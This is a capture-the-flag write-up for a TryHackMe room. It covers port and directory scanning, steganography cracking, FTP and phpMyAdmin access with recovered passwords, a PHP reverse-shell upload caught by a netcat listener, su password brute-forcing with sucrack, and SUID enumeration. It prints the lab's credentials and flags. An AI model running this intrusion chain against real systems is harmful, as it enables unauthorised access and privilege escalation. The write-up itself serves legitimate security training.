Different CTF from TryHackMe
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
A Hard THM Challenge. Steganography, Database Handling, FTP, WordPress CMS, and Brute-Forcing. This Room Has Everything.
Port Scanning
scan the machine for open ports via rustscan.
rustscan -a 10.10.154.178 -- -A
we have 2 ports are opened 21 and 80.
1 - How many ports are open ?
Ans. 2
Web Enumeration
Then I went to port 80. The port is a hosted service but we see that it is damaged.
Then source code review .
vim /etc/hosts
Then I ran Gobuster and I funded the Hidden Directory.
gobuster dir -u https://adana.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/phpmyadmin
/wp-admin
/announcements
I found a wordlists file and an image here and I downloaded both.
What is the name of the secret directory ?
Ans. /announcements
Steghide
Interesting. Checking the strings and the binwalk commands showed nothing, however, steghide allows me to enter a passphrase.
Time to use stegseek:
Then login ftp:
USER: hakanftp
PASS: 123adanacrack
I download wp.config.php through get command.
I found Username:Password=phpmyadmin:12345
login phpmyadmin then click phpmyadmin1 and second visit wp-options and here we got subdomain.
Then vim /etc/hosts
Uploaded reversephp file from ftp using put command.Then chmod 777 reverseshell.php.
Then start nc -lvnp 8080. visit https://subdomain.adana.thm
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /var/www/html
cat wwe3bbfla4g.txt
Web flag ?
Ans. THM{343a7e2064a1d992c01ee201c346edff}
There is a user found but no permissions.
We have shell now. I can’t be root in this shell but I noticed an user named hakanbey. We can crack this user’s password with sucrack tool (sucrack can crack users password in the server). Now we can transfer our sucrack tool to our hacked machine with python http server. Install sucrack, go to /usr/bin directory (because packages are in this directory) and start python http server.
git clone https://github.com/hemp3l/sucrack.git
tar -czvf source-sucrack.tar.gz ./sucrack
ftp> put source-sucrack.tar.gz
local: source-sucrack.tar.gz remote: source-sucrack.tar.gz
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
321789 bytes sent in 0.09 secs (3.3806 MB/s)
ftp> put wordlist.txt
local: wordlist.txt remote: wordlist.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
403891 bytes sent in 0.12 secs (3.1115 MB/s)
ftp> chmod 777 source-sucrack.tar.gz
200 SITE CHMOD command ok.
ftp> chmod 777 wordlist.txt
200 SITE CHMOD command ok.
www-data@ubuntu:/$ mv /var/www/subdomain/source-sucrack.tar.gz /tmp
www-data@ubuntu:/$ mv /var/www/subdomain/wordlist.txt /tmp
www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ tar xfz source-sucrack.tar.gz
www-data@ubuntu:/tmp$ cd sucrack/
www-data@ubuntu:/tmp/sucrack$ ./configure
make
I realised that 123adana is a prefix we saw for both the above passwords. Maybe the password is also starting from that? I looked it in the list and there was only one match. Did not work.
sed 's/^/123adana/' wordlist.txt > wordlist2.txt
mv wordlist2.txt /tmp/sucrack/src
cd /home/hakanbey/
hakanbey@ubuntu:~$ cat user.txt
User flag ?
Ans. THM{8ba9d7715fe726332b7fc9bd00e67127}
Privilege
find / -perm -4000 -type f 2>/dev/null
binary is interesting. Let’s capture binary signals and execute /usr/bin/binary
transfer this file to our machine.
In binary output, there is a hint. Hint is Hexeditor 00000020
Use a hex editor for root.jpg and check 00000020
cp /home/hakanbey/root.jpg /var/www/subdomain
Ftp ls I see root.jpg
get root.jpg
xxd -l 50 root.jpg
00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0060 ......JFIF.....`
00000010: 0060 0000 ffe1 0078 4578 6966 0000 4d4d .`.....xExif..MM
00000020: fee9 9d3d 7918 5ffc 826d df1c 69ac c275 ...=y._..m..i..u
Root.flag?
THM{c5a9d3e4147a13cbd1ca24b014466a6c}